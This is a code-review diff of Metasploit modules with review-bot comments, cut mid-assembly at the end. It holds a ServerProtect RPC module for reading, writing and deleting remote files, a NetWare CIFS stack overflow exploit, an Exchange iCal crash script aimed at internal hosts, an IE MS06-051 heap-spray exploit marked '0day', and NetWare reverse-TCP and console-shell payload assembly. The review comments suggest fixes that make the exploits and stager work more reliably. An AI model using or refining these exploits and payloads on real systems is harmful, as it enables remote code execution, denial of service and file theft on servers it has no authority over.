[ 'upload' ],
[ 'list' ]
]
))
register_options(
[
Opt::RPORT(5168),
OptString.new('RPATH',
[
false,
"The remote filesystem path",
nil
]
),
OptString.new('LPATH',
[
false,
"The local filesystem path",
nil
]
),
], self.class)
end
def check_option(name)
if(not datastore[name])
raise RuntimeError, "The #{name} parameter is required by this option"
end
end
def auxiliary_commands
{
"delete" => "Delete a file",
"download" => "Download a file",
"upload" => "Upload a file",
"list" => "List files (not recommended - will crash the driver)",
}
end
def run
case action.name
when 'download'
check_option('RPATH')
check_option('LPATH')
cmd_download(datastore['RPATH'], datastore['LPATH'])
when 'upload'
check_option('RPATH')
check_option('LPATH')
cmd_upload(datastore['RPATH'], datastore['LPATH'])
when 'delete'
check_option('RPATH')
cmd_delete(datastore['RPATH'])
when 'list'
check_option('RPATH')
cmd_list(datastore['RPATH'])
else
print_error("Unknown action #{action.name}")
end
end
def deunicode(str)
str.gsub(/\x00/, '').strip
end
#
# Once this function is used, if cmd_download or cmd_upload is called the server will crash :/
#
def cmd_list(*args)
if (args.length < 1)
print_status("Usage: list folder")
return
end
file = Rex::Text.to_unicode(args[0])
data = "\0" * 0x100
data[4, file.length] = file
# FindFirstFile
resp = serverprotect_rpccmd(131080, data, 0x100)
return if not resp
if resp.length != 0x108
print_status("An unknown error occured while calling FindFirstFile.")
return
end
ret, = resp[0x104,4].unpack('V')
if ret != 0
print_status("An error occurred while calling FindFirstFile #{args[0]}: #{ret}.")
return
end
handle, = resp[4,4].unpack('V')
file = deunicode(resp[0x30, 0xd0])
print("#{file}\n")
data = "\0" * 0x100
data[0,4] = [handle].pack('V')
while true
# FindNextFile
resp = serverprotect_rpccmd(131081, data, 0x100)
return if not resp
if resp.length != 0x108
print_status("An unknown error occured while calling FindFirstFile.")
break
end
ret, = resp[0x104,4].unpack('V')
if ret != 0
break
end
file = deunicode(resp[0x30, 0xd0])
print("#{file}\n")
end
data = "\0" * 0x100
data = [handle].pack('V')
# FindClose
resp = serverprotect_rpccmd(131082, data, 0x100)
end
def cmd_delete(*args)
if (args.length == 0)
print_status("Usage: delete c:\\windows\\system.ini")
return
end
data = Rex::Text.to_unicode(args[0]+"\0")
resp = serverprotect_rpccmd(131077, data, 4)
return if not resp
if (resp.length == 12)
ret, = resp[8,4].unpack('V')
if ret == 0
print_status("File #{args[0]} successfuly deleted.")
else
print_status("An error occurred while deleting #{args[0]}: #{ret}.")
end
end
end
def cmd_download(*args)
if (args.length < 2)
print_status("Usage: download remote_file local_file")
return
end
# GENERIC_READ: 0x80000000
# FILE_SHARE_READ: 1
# OPEN_EXISTING: 3
# FILE_ATTRIBUTE_NORMAL: 0x80
handle = serverprotect_createfile(args[0], 0x80000000, 1, 3, 0x80)
if (not handle or handle == 0)
return
end
fd = File.new(args[1], "wb")
print_status("Downloading #{args[0]}...")
# reads 0x1000 bytes (hardcoded in the soft)
while ((data = serverprotect_readfile(handle)).length > 0)
fd.write(data)
end
fd.close
serverprotect_closehandle(handle)
print_status("File #{args[0]} successfuly downloaded.")
end
def cmd_upload(*args)
if (args.length < 2)
print_status("Usage: upload local_file remote_file")
return
end
# GENERIC_WRITE: 0x40000000
# FILE_SHARE_WRITE: 2
# CREATE_ALWAYS: 2
# FILE_ATTRIBUTE_NORMAL: 0x80
handle = serverprotect_createfile(args[1], 0x40000000, 2, 2, 0x80)
if (handle == 0)
return
end
fd = File.new(args[0], "rb")
print_status("Uploading #{args[1]}...")
# write 0x1000 bytes (hardcoded in the soft)
while ((data = fd.read(0x1000)) != nil)
serverprotect_writefile(handle, data)
end
fd.close
serverprotect_closehandle(handle)
print_status("File #{args[1]} successfuly uploaded.")
end
def serverprotect_createfile(file, desiredaccess, sharemode, creationdisposition, flags)
data = "\0" * 540
file = Rex::Text.to_unicode(file)
data[4, file.length] = file
data[524, 16] = [desiredaccess, sharemode, creationdisposition, flags].pack('VVVV')
resp = serverprotect_rpccmd(131073, data, 540)
return if not resp
if (resp.length < 548)
print_status("An unknown error occurred while calling CreateFile.")
return 0
else
handle, = resp[4,4].unpack('V')
ret, = resp[544,4].unpack('V')
if ret != 0
print_status("An error occured while calling CreateFile: #{ret}.")
return 0
else
return handle
end
end
end
def serverprotect_readfile(handle)
data = "\0" * 4104
data[0, 4] = [handle].pack('V')
resp = serverprotect_rpccmd(131075, data, 4104)
return if not resp
if (resp.length != 4112)
print_status("An unknown error occurred while calling ReadFile.")
return ''
else
ret, = resp[4108,4].unpack('V')
if ret != 0
print_status("An error occured while calling CreateFile: #{ret}.")
return ''
else
br, = resp[4104, 4].unpack('V')
return resp[8, br]
end
end
end
def serverprotect_writefile(handle, buf)
data = "\0" * 4104
data[0, 4] = [handle].pack('V')
data[4, buf.length] = buf
data[4100, 4] = [buf.length].pack('V')
resp = serverprotect_rpccmd(131076, data, 4104)
return if not resp
if (resp.length != 4112)
print_status("An unknown error occurred while calling WriteFile.")
return 0
else
ret, = resp[4108,4].unpack('V')
if ret != 0
print_status("An error occured while calling WriteFile: #{ret}.")
return 0
end
end
return 1
end
def serverprotect_closehandle(handle)
data = [handle].pack('V')
resp = serverprotect_rpccmd(131074, data, 4)
return if not resp
if (resp.length != 12)
print_status("An unknown error occurred while calling CloseHandle.")
else
ret, = resp[8,4].unpack('V')
if ret != 0
print_status("An error occured while calling CloseHandle: #{ret}.")
end
end
end
def serverprotect_rpccmd(cmd, data, osize)
if (data.length.remainder(4) != 0)
padding = "\0" * (4 - (data.length.remainder(4)))
else
padding = ""
end
stub =
NDR.long(cmd) +
NDR.long(data.length) +
data +
padding +
NDR.long(data.length) +
NDR.long(osize)
return serverprotect_rpc_call(0, stub)
end
#
# Call the serverprotect RPC service
#
def serverprotect_rpc_call(opnum, data = '')
begin
connect
handle = dcerpc_handle(
'25288888-bd5b-11d1-9d53-0080c83a5c2c', '1.0',
'ncacn_ip_tcp', [datastore['RPORT']]
)
dcerpc_bind(handle)
resp = dcerpc.call(opnum, data)
outp = ''
if (dcerpc.last_response and dcerpc.last_response.stub_data)
outp = dcerpc.last_response.stub_data
end
disconnect
outp
rescue ::Interrupt
raise $!
rescue ::Exception => e
print_error("Error: #{e}")
nil
end
end
end
end
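Review bot: `data = [handle].pack('V')` in the FindClose step (L891) throws away the 0x100-byte buffer built on the line before it and sends a 4-byte stub while `serverprotect_rpccmd` is still told `osize` is 0x100; the FindNextFile loop writes the handle as `data[0,4] = [handle].pack('V')` (L874), so this reads like a slip of the same form and is worth checking against the crash described in the comment at the top of `cmd_list`. Two smaller points: `cmd_upload` only tests `handle == 0` (L945), but `serverprotect_createfile` returns nil when the RPC call itself fails (`return if not resp`, L964), so a failed CreateFile falls through into `serverprotect_writefile(nil, ...)`, where packing nil with 'V' raises a TypeError; `cmd_download` already uses `if (not handle or handle == 0)` (L922) and the same guard belongs here. The error strings also name the wrong call in two places (FindFirstFile inside the FindNextFile loop at L880, CreateFile inside `serverprotect_readfile` at L990), and "successfuly" is misspelled in three status messages (L906, L933, L956).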

View File

@ -0,0 +1,129 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
module Msf
class Exploits::Netware::Smb::LsassCifs < Msf::Exploit::Remote
include Exploit::Remote::DCERPC
include Exploit::Remote::SMB
def initialize(info = {})
super(update_info(info,
'Name' => 'Novell NetWare LSASS CIFS.NLM Driver Stack Overflow',
'Description' => %q{
This module exploits a stack overflow in the NetWare CIFS.NLM driver.
Since the driver runs in the kernel space, a failed exploit attempt can
cause the OS to reboot.
},
'Author' =>
[
'toto',
],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
],
'Privileged' => true,
'Payload' =>
{
'Space' => 400,
'BadChars' => "\x00",
},
'Platform' => 'netware',
'Targets' =>
[
# NetWare SP can be found in the SNMP version :
# 5.70.07 -> NetWare 6.5 (5.70) SP7 (07)
[ 'VMware', { 'Ret' => 0x000f142b } ],
[ 'NetWare 6.5 SP2', { 'Ret' => 0xb2329b98 } ], # push esp - ret (libc.nlm)
[ 'NetWare 6.5 SP3', { 'Ret' => 0xb234a268 } ], # push esp - ret (libc.nlm)
[ 'NetWare 6.5 SP4', { 'Ret' => 0xbabc286c } ], # push esp - ret (libc.nlm)
[ 'NetWare 6.5 SP5', { 'Ret' => 0xbabc9c3c } ], # push esp - ret (libc.nlm)
[ 'NetWare 6.5 SP6', { 'Ret' => 0x823c835c } ], # push esp - ret (libc.nlm)
[ 'NetWare 6.5 SP7', { 'Ret' => 0x823c83fc } ], # push esp - ret (libc.nlm)
],
'DisclosureDate' => 'Jan 21 2007'))
register_options(
[
OptString.new('SMBPIPE', [ true, "The pipe name to use (LSARPC)", 'lsarpc'])
], self.class)
end
def exploit
# Force multi-bind off (netware doesn't support it)
datastore['DCERPC::fake_bind_multi'] = false
connect()
smb_login()
handle = dcerpc_handle('12345778-1234-abcd-ef00-0123456789ab', '0.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"])
print_status("Binding to #{handle} ...")
dcerpc_bind(handle)
print_status("Bound to #{handle} ...")
stb =
NDR.long(rand(0xffffffff)) +
NDR.UnicodeConformantVaryingString("\\\\#{datastore['RHOST']}") +
NDR.long(0) +
NDR.long(0) +
NDR.long(0) +
NDR.long(0) +
NDR.long(0) +
NDR.long(0) +
NDR.long(0x000f0fff)
resp = dcerpc.call(0x2c, stb)
handle, = resp[0,20]
code, = resp[20, 4].unpack('V')
name =
rand_text_alphanumeric(0xa0) +
[target.ret].pack('V') +
payload.encoded
stb =
handle +
NDR.long(1) +
NDR.long(1) +
NDR.short(name.length) +
NDR.short(name.length) +
NDR.long(rand(0xffffffff)) +
NDR.UnicodeConformantVaryingStringPreBuilt(name) +
NDR.long(0) +
NDR.long(0) +
NDR.long(1) +
NDR.long(0)
print_status("Calling the vulnerable function ...")
begin
dcerpc.call(0x0E, stb)
rescue => e
end
# Cleanup
handler
disconnect
end
end
end
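Review bot: the return code of the first call is unpacked at L1150 (`code, = resp[20, 4].unpack('V')`) but never examined, so if the opnum 0x2c call at L1148 fails the module still builds the second request around whatever sits in `resp[0,20]`; test `code` and stop with a print_error before the second `stb` is assembled. `resp` can also be nil when that call fails, in which case `resp[0,20]` raises rather than reporting the problem. The `rescue => e` at L1170 swallows every exception silently and leaves `e` unused; since the description at L1092-L1093 warns that a failed attempt can reboot the target, printing the exception would at least tell the operator which outcome they got. The References list at L1101-L1103 is empty even though a DisclosureDate is given at L1123; either add the advisory or note where the date comes from.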

View File

@ -1 +0,0 @@
Modules in this directory are not accessible to read-only SVN users.

View File

@ -1,133 +0,0 @@
#!/usr/bin/env ruby
#
# Important section:
#
# BEGIN:VEVENT
# DTSTAMP:20060509T194627Z
# DTSTART;TZID:20060509T150000
# END:VEVENT
#
# the DTSTART;TZID line requires the following form to be valid:
# DTSTART;TZID="timezone info goes here":<time>
#
# without the ="" it'll produce a read error in mimedir.dll @ 354dc00d
# mov eax, [eax + ecx + 0x8] <-- we control ecx
#
# Probably other possible crashes - still working.
#
# ~ Puss
#
$:.unshift('~/src/framework3/trunk/lib')
require 'rex'
s = Rex::Socket.create_tcp(
'PeerHost' => '10.4.10.190',
'PeerPort' => 25
)
puts s.get_once
s.write("EHLO X\r\n")
puts s.get_once
s.write("MAIL FROM: bar@EXCHNG.sfeng.sourcefire.com\r\n")
puts s.get_once
s.write("RCPT TO: foo@EXCHNG.sfeng.sourcefire.com\r\n")
puts s.get_once
s.write("DATA\r\n")
puts s.get_once
bsize = 32768
x =
%Q[ From: bar@EXCHNG.sfeng.sourcefire.com
To: foo@EXCHNG.sfeng.sourcefire.com
Subject: iCal Exploit
Content-class: urn:content-classes:calendarmessage
MIME-Version: 1.0
Content-Type: multipart/alternative;boundary="01BD3665.3AF0D360"
X-MimeOLE: Produced By Microsoft Exchange V6.5.7226.0
--01BD3665.3AF0D360
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: base64
VHlwZTpTaW5nbGUgTWVldGluZw0KT3JnYW5pemVyOkhEIE1vb3JlDQpTdGFydCBUaW1lOlR1ZXNk
YXksIE1heSAwOSwgMjAwNiAzOjAwIFBNDQpFbmQgVGltZTpUdWVzZGF5LCBNYXkgMDksIDIwMDYg
MzozMCBQTQ0KVGltZSBab25lOihHTVQtMDY6MDApIENlbnRyYWwgVGltZSAoVVMgJiBDYW5hZGEp
DQpMb2NhdGlvbjpib2FyZCByb29tDQoNCip+Kn4qfip+Kn4qfip+Kn4qfioNCg0KDQpUaGlzIGlz
IGEgdGVzdA0KDQpNaWNyb3NvZnQgT3V0bG9vayBXZWIgQWNjZXNzOg0KaHR0cDovL01BSUwvRXhj
aGFuZ2UvaGRtb29yZS9JbmJveC90ZXN0LTIuRU1MP2NtZD1vcGVuDQoNCg==
--01BD3665.3AF0D360
Content-Type: text/html; charset="UTF-8"
Content-Transfer-Encoding: base64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--01BD3665.3AF0D360
Content-class: urn:content-classes:calendarmessage
Content-Type: text/calendar; method=REQUEST; name="meeting.ics"
Content-Transfer-Encoding: 8bit
BEGIN:VCALENDAR
METHOD:REQUEST
PRODID:Microsoft CDO for Microsoft Exchange
VERSION:2.0
BEGIN:VTIMEZONE
TZID:(GMT-06.00) Central Time (US & Canada)
X-MICROSOFT-CDO-TZID:11
BEGIN:STANDARD
DTSTART:16010101T020000
TZOFFSETFROM:-0500
TZOFFSETTO:-0600
RRULE:FREQ=YEARLY;WKST=MO;INTERVAL=1;BYMONTH=10;BYDAY=-1SU
END:STANDARD
BEGIN:DAYLIGHT
DTSTART:16010101T020000
TZOFFSETFROM:-0600
TZOFFSETTO:-0500
RRULE:FREQ=YEARLY;WKST=MO;INTERVAL=1;BYMONTH=4;BYDAY=1SU
END:DAYLIGHT
END:VTIMEZONE
BEGIN:VEVENT
DTSTAMP:20060509T194627Z
DTSTART;TZID:20060509T150000
END:VEVENT
END:VCALENDAR
--01BD3665.3AF0D360
]
x.each_line do |line|
line.strip!
s.write(line + "\r\n")
end
s.write(".\r\n")
puts s.get_once
s.write("QUIT\r\n")
puts s.get_once
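Review bot: nothing to change in a pure deletion, but for the record this standalone script carried an internal test host (L1209) and internal mailbox addresses (L1215, L1217) rather than framework options, and the only durable content is the note on the malformed `DTSTART;TZID` line at L1196-L1200; if that behaviour is ever turned into a module it should carry that note and a reference, not the hardcoded endpoints.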

View File

@ -1,203 +0,0 @@
##
# $Id:$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
module Msf
class Exploits::Private::IeUnexpFilt < Msf::Exploit::Remote
include Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'MS06-051 Unhandled Exception Filter Hijack',
'Description' => %q{
This module exploits a design error in the way that the unhandled
exception filter chain is managed. By loading and unloading DLLs
that register UEFs in the proper order, it is possible to cause
the top-level unhandled exception filter to point to an invalid
memory address. Using heap spraying techniques, it is possible
to place attacker controlled code at the location that the top-level
unhandled exception filter points. Generating an unhandled
exception then leads to code execution.
},
'License' => MSF_LICENSE,
'Author' =>
[
'skape',
],
'Version' => '$Revision$',
'References' =>
[
# 0day
],
'Payload' =>
{
'Space' => 1000,
'MaxNops' => 0
},
'Targets' =>
[
# Target 0: Automatic
[
'Windows NT/2000/XP/2003 Automatic',
{
'Platform' => 'win',
},
],
],
'DefaultTarget' => 0))
end
def on_request_uri(cli, request)
p = payload
# Re-generate the payload
return if (request.qstring['window'].nil? and (p = regenerate_payload(cli)) == nil)
hex = p.encoded.unpack('H*')[0]
content =
"<html><script language='javascript'>
var w1;
var w2;
function win1()
{
// GBDetect is small, so we have to take steps to make sure
// that the heap grows into the region. Therefore, we need
// to load DLLs that will be loaded at lower addresses.
// This series works reliably, but relies on vmware:
//new ActiveXObject('vmappcfg.ProjWz.9');
//new ActiveXObject('GBDetect.Detect');
//new ActiveXObject('vmhwcfg.Hwz.9');
// This series works reliably
//new ActiveXObject('OPUCatalog.OPUCatalog11'); // office
//new ActiveXObject('GBDetect.Detect'); // adobe -- trigger DLL
//new ActiveXObject('NvCpl.NvCplLateBound'); // nvidia
//new ActiveXObject('BarControl.GDSControl'); // realplayer
// works all by itself, just need to spray better
//new ActiveXObject('GBDetect.Detect'); // adobe -- trigger DLL
// these may be useful...
//new ActiveXObject('CDDBRealControl.CDDBControl');//realplayer
//new ActiveXObject('CEnroll.CEnroll');
// These overlap on XPSP2, not on XPSP0. msado15 is larger
new ActiveXObject('RDS.DataControl'); // msadco
new ActiveXObject('ADODB.Record'); // msado15
// Acrobat OCX
new ActiveXObject('GBDetect.Detect'); // adobe -- trigger DLL
window.opener.open2();
}
function win2()
{
// Some random real player activex control that sets an unhandled
// exception filter indirectly through another DLL.
//new ActiveXObject('IERJCtl.IERJCtl');
// Even though an object instance isn't created as a result of this,
// the DLL associated with this COM object is still loaded, causing
// it to register its UEF.
try
{
new ActiveXObject('CompatUI.Util');
} catch(err)
{
}
window.opener.go();
}
function crash()
{
var sp1 = spray(0);
// IE crash bug #134234
a = new ActiveXObject('ADODB.Recordset');
try { a.Filter = 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' } catch(e) { }
try { a.Filter = 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' } catch(e) { }
try { a.Filter = 0x7ffffffe; } catch(e) { }
}
function spray(length)
{
var payloadHex = \"#{hex}\";
var payload = unescape(payloadHex.replace(/([0-9A-Fa-f]{2})([0-9A-Fa-f]{2})/g, \"%u$2$1\"));
CollectGarbage();
var spray = unescape('%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141');
if (length == 0)
length = 0x4000000;
do
{
if (spray.length >= 0x10000)
spray += payload;
spray += spray;
} while (spray.length < length);
spray += payload;
}
function close2()
{
w2.close();
setTimeout('crash();', 1000);
}
function close1()
{
w1.close();
setTimeout('close2();', 1000);
}
function go()
{
setTimeout('close1();', 1000);
}
function open2()
{
w2 = window.open('#{request.resource}?window=1', 'win2');
}
if (window.opener == null)
{
spray(0x100000);
w1 = window.open('#{request.resource}?window=1', 'win1');
}
else
{
if (window.name == 'win1')
win1();
else
win2();
}
</script></html>";
# Transmit the response to the client
send_response_html(cli, content)
end
end
end
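Review bot: removing this module from the tree looks intended: its References block (L1316-L1319) contains only the `# 0day` comment and no advisory, so it was not in a state to ship publicly. If it is ever reinstated it needs a public reference, and the window open/close ordering driven by the `setTimeout` chain at L1413-L1426 should be documented in the module rather than left to be inferred from the description at L1301-L1308.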

View File

@ -0,0 +1,212 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'metasm'
require 'msf/core'
require 'msf/core/handler/reverse_tcp'
module Msf
module Payloads
module Stagers
module Netware
module ReverseTcp
include Msf::Payload::Stager
include Msf::Payload::Netware
def initialize(info = {})
super(merge_info(info,
'Name' => 'Reverse TCP Stager',
'Version' => '$Revision$',
'Description' => 'Connect back to the attacker',
'Author' => 'toto',
'License' => MSF_LICENSE,
'Platform' => 'netware',
'Arch' => ARCH_X86,
'Handler' => Msf::Handler::ReverseTcp,
'Convention' => 'sockesi',
'Stager' =>
{
'Offsets' =>
{
'LHOST' => [ 0, 'ADDR' ],
'LPORT' => [ 0, 'n' ],
},
'Assembly' => <<EOS
jmp main_code
;;;
; resolve a symbol address using the DebuggerSymbolHashTable
; (could resolve only against function name for smaller code)
;;;
resolv_addr:
push edi
push ecx
xor edi, edi
r_loop:
mov edx, [ebp+edi*4]
test edx, edx
jz r_next
r_loop2:
xor esi, esi
mov ebx, [edx+8]
mov al, byte ptr[ebx]
r_iloop2:
test al, al
jz r_after2
inc ebx
movzx ecx, byte ptr[ebx]
ror esi, 0x0d
add esi, ecx
dec al
jmp r_iloop2
r_after2:
cmp esi, [esp+0x0c]
jz r_found
mov edx, [edx]
test edx, edx
jnz r_loop2
r_next:
inc edi
cmp edi, 0x200
jnz r_loop
jmp r_end
r_found:
mov eax, [edx+4]
r_end:
pop ecx
pop edi
ret
main_code:
; search DebuggerSymbolHashTable pointer
cli
mov ebp, 0x300000 ; SERVER.NLM code
f_finddebugger:
cmp dword ptr[ebp], 0x8110eac1
jnz f_next
cmp dword ptr[ebp+4], 0x0001ffe2
jz f_end
f_next:
inc ebp
jmp f_finddebugger
f_end:
mov ebp, [ebp+0xc]
; resolve function pointers
call current
current:
pop edi
add edi, (fct_ptrs - current)
mov cl, 6
resolv_ptrs:
push [edi]
call resolv_addr
stosd
dec cl
test cl, cl
jnz resolv_ptrs
sti
; remove CIFS lock
call [edi-4] ; NSS.NLM|NSSMPK_UnlockNss
; allocate heap buffer to remove the code from the stack (if on the stack)
; network functions will give back control to the kernel and we don't want
; the driver to erase our shellcode
push 65535
call [edi-8] ; AFPTCP.NLM|LB_malloc
mov ecx, (end_reverse - reverse_connect)
mov esi, edi
sub esi, ecx
mov edi, eax
test eax, eax
jz end
repe movsb
jmp eax
reverse_connect:
xor ebx, ebx
push ebp
mov ebp, esp
push ebp
push ebx ; protocol
push 1 ; SOCK_STREAM
push 2 ; AF_INET
call [edi-0xc] ; LIBC.NLM|bsd_socket_mp
mov esi, eax
test eax, eax
jz end
push ebx
push ebx
push LHOST
push.i16 LPORT
push.i16 2
mov ecx, esp
push ebp
push 16
push ecx
push esi
call [edi-0x10] ; LIBC.NLM|bsd_connect_mp
cmp eax, -1
jz end
push 65535
push edi
mov ecx, esp
push ebx
push ebx
push ebx
inc ebx
push ebx
dec ebx
push ecx
push ebx
push ebx
mov ecx, esp
push ebp
push ebx
push ecx
push esi
call [edi-0x14] ; LIBC.NLM|bsd_recvmsg_mp
jmp edi
end:
; go back to the main kernel loop
call [edi-0x18] ; SERVER.NLM|kWorkerThread
fct_ptrs:
dd 0x9294bdcb ; SERVER.NLM|kWorkerThread
dd 0x3605cc1c ; LIBC.NLM|bsd_recvmsg_mp
dd 0x19a75280 ; LIBC.NLM|bsd_connect_mp
dd 0x46f23d88 ; LIBC.NLM|bsd_socket_mp
dd 0x6877687c ; AFPTCP.NLM|LB_malloc
dd 0x8967f0ce ; NSS.NLM|NSSMPK_UnlockNss
end_reverse:
nop
EOS
}
))
end
end
end end end end
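Review bot: the stage is fetched with a single `bsd_recvmsg_mp` at L1616 and control is passed to it with `jmp edi` at L1617 without checking how many bytes arrived, so a stage delivered in more than one TCP segment is executed partially received; loop on recvmsg until a known length has been read (which means the handler side sends a length prefix) or at least compare the return value with the expected size before jumping. Two smaller points: the signature scan at L1534-L1542 starts at 0x300000 with no upper bound, so a server whose SERVER.NLM image lacks the two dwords compared at L1536 and L1538 keeps walking memory with interrupts disabled by the `cli` at L1533; a bound with a fall-through to `end` would make a missed signature fail more gracefully. `repe movsb` at L1572 should be `rep movsb` (same encoding, but `repe` is the cmps/scas form). Finally, the `LHOST`/`LPORT` entries in `Offsets` at L1484-L1485 are both 0, which only works if the framework rewrites them from the assembled symbols; a one-line comment saying so would save the next reader a trip into the payload code.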

View File

@ -0,0 +1,471 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'metasm'
require 'msf/core'
require 'msf/base/sessions/command_shell'
module Msf
module Payloads
module Stages
module Netware
module NetwareConsole
def initialize(info = {})
super(merge_info(info,
'Name' => 'NetWare Command Shell',
'Version' => '$Revision$',
'Description' => 'Connect to the NetWare console',
'Author' => 'toto',
'License' => MSF_LICENSE,
'Platform' => 'netware',
'Arch' => ARCH_X86,
'Session' => Msf::Sessions::CommandShell,
'PayloadCompat' =>
{
'Convention' => 'sockesi'
},
'Stage' =>
{
'Offsets' =>
{
#'EXITFUNC' => [ 443, 'V' ]
},
'Assembly' => <<EOS
jmp main_code
;;;
; resolve a symbol address using the DebuggerSymbolHashTable
; (could resolve only against function name for smaller code)
;;;
resolv_addr:
push edi
push ecx
xor edi, edi
r_loop:
mov edx, [ebp+edi*4]
test edx, edx
jz r_next
r_loop2:
xor esi, esi
mov ebx, [edx+8]
mov al, byte ptr[ebx]
r_iloop2:
test al, al
jz r_after2
inc ebx
movzx ecx, byte ptr[ebx]
ror esi, 0x0d
add esi, ecx
dec al
jmp r_iloop2
r_after2:
cmp esi, [esp+0x0c]
jz r_found
mov edx, [edx]
test edx, edx
jnz r_loop2
r_next:
inc edi
cmp edi, 0x200
jnz r_loop
jmp r_end
r_found:
mov eax, [edx+4]
r_end:
pop ecx
pop edi
ret
main_code:
; save socket identifier
call main_next
main_next:
pop edi
add edi, (socket_ptr - main_next)
mov eax, esi
stosd
; search DebuggerSymbolHashTable pointer
cli
mov ebp, 0x300000 ; SERVER.NLM code
f_finddebugger:
cmp dword ptr[ebp], 0x8110eac1
jnz f_next
cmp dword ptr[ebp+4], 0x0001ffe2
jz f_end
f_next:
inc ebp
jmp f_finddebugger
f_end:
mov ebp, [ebp+0xc]
; resolve function pointers
mov cl, 15
resolv_ptrs:
push [edi]
call resolv_addr
stosd
dec cl
test cl, cl
jnz resolv_ptrs
sti
; all screens have the same size
push edi
lea esi, [edi+4]
push esi
call [edi-0x18] ; SERVER.NLM|GetScreenSize
; allocate 2 buffer for the main screen and the backup
xor eax, eax
xor ebx, ebx
mov ax, word ptr[edi]
mov bx, word ptr[esi]
imul eax, ebx
mov [edi+8], eax
push eax
call [edi-8] ; AFPTCP.NLM|LB_malloc
mov [edi+0xc], eax
call [edi-0x14] ; SERVER.NLM|GetSystemConsoleScreen
mov [edi+0x10], eax
sub esp, 4
mov ebp, esp ; n
recv_loop:
xor ebx, ebx
inc ebx
push 200000 ; tv_usec
push 0 ; tv_sec (0)
mov edx, esp ; timeout
sub esp, 4
mov ecx, esp ; rescode
push 1 ; num socket (1)
push ecx ; &rescode
push edx ; &timeout
push 0 ; NULL
push 0 ; NULL
push 0 ; NULL
push [edi-0x40] ; socket
call [edi-0x2C] ; LIBC.NLM|bsd_select_mp
add esp, 0x28
test eax, eax
jnz end
call update_screen
sub esp, 4
mov edx, esp
push edx ; &rescode
push ebp ; &n
push ebx ; FIONREAD
push [edi-0x40] ; socket
call [edi-0x38] ; LIBC.NLM|_ioctlsocket
add esp, 0x14
test eax, eax
jnz end
cmp [ebp], 0
jz recv_loop
; check we are not longer than the key buffer size
cmp [ebp], 32
jbe recvd
mov [ebp], 32
recvd:
lea eax, [edi+0x20]
push [ebp]
push eax
call recv_data
add esp, 8
mov ebx, [ebp]
lea esi, [edi+0x20]
mov byte ptr[esi+ebx], 0
; push 0x00FFFEFF
; mov eax, esp
; push eax
; push [edi+0x10] ; screen
; call [edi-0x3C] ; SERVER.NLM|DirectOutputToScreen
; add esp, 0x0c
send_input:
movzx eax, byte ptr[esi]
test eax, eax
jz send_end
cmp al, 0x0a
jz send_enter
; we need to inject the command in the console input
push 0x00
push 0x00 ; should be the keycode in fact
push eax ; key value
push 0x0
push [edi+0x10] ; screen
call [edi-0x20] ; SERVER.NLM|AddKey
jmp send_next
send_enter:
; send special code for enter
push 0x1c
push 0x00
push 0x00
push 0x02
push [edi+0x10] ; screen
call [edi-0x20] ; SERVER.NLM|AddKey
push 0x00FFFEFF
mov eax, esp
push eax
push [edi+0x10] ; screen
call [edi-0x3C] ; SERVER.NLM|DirectOutputToScreen
add esp, 0x0c
send_next:
add esp, 0x14
inc esi
jmp send_input
send_end:
jmp recv_loop
end:
sub esp, 4
mov ebp, esp ; rescode
push ebp ; rescode
push 2 ; SHUT_RDWR
push [edi-0x40] ; socket
call [edi-0x30] ; LIBC.NLM|bsd_shutdown_mp
push ebp ; rescode
push [edi-0x40] ; socket
call [edi-0x34] ; LIBC.NLM|bsd_close_mp
; go back to the main kernel loop
call [edi-0x0C] ; SERVER.NLM|kWorkerThread
update_screen:
pushad
push [edi+0x0c]
push 0
push [edi+0x08]
push 0
push [edi+0x10]
call [edi-0x1C] ; SERVER.NLM|ReadScreenIntoBuffer
add esp, 0x14
mov edx, [edi+0x0c]
xor ebx, ebx
xor esi, esi
xor ebp, ebp
checksum:
cmp ebx, [edi+4]
jz end_checksum
xor ecx, ecx
check_line:
cmp ecx, [edi]
jz next_line
mov al, byte ptr[edx]
ror esi, 0x0d
add esi, eax
cmp [edx], 0x20FFFEFF
jnz check_line2
mov ebp, ebx
inc ebp
check_line2:
inc edx
inc ecx
jmp check_line
next_line:
inc ebx
jmp checksum
end_checksum:
cmp esi, [edi+0x14]
jnz new_checksum
cmp [edi+0x18], 1
jz end_update
mov [edi+0x18], 1
push ebp
call send_screen
add esp, 4
jmp end_update
new_checksum:
mov [edi+0x14], esi
mov [edi+0x18], 0
end_update:
popad
ret
send_screen:
push ebx
sub esp, 4
mov esi, esp
push esi
lea eax, [esi+2]
push eax
push [edi+0x10]
call [edi-0x10] ; SERVER.NLM|GetInputCursorPosition
add esp, 0x0c
mov ebx, [esp+0x0c]
xor edx, edx
mov ecx, [edi+0x0c]
mov eax, dword ptr[edi]
imul eax, ebx
add ecx, eax
send_loop:
cmp bx, word ptr[esi+2]
jae last_line
mov dx, word ptr[edi]
jmp next_send
last_line:
mov dx, word ptr[esi]
next_send:
push edx
push ecx
call send_data
add esp, 0x08
cmp bx, word ptr[esi+2]
jae end_sl
push 0x0000000a
mov eax, esp
push 1
push eax
call send_data
add esp, 0x0C
inc ebx
add ecx, edx
cmp bx, word ptr[esi+2]
jbe send_loop
end_sl:
pop ebx
pop ebx
ret
send_data:
